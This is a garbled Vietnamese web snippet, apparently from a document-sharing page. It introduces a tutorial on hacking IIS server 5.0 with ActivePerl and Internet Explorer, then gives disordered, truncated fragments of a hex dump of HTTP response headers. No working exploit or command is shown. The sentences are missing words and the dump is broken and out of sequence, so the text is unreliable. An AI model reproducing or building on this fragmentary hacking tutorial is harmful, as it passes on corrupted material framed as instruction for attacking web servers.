huynh Vicky ) 49 ) Kỹ thuật hack IIS server 5.0 : _ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều lỗi để ta thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn thể vận dụng cho . 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 20 00 20 :54: 02 GM< 00000080. 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 20 0 OK.< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F< 00000 020

Ngày đăng: 02/11/2012, 14:18

TỪ KHÓA LIÊN QUAN

w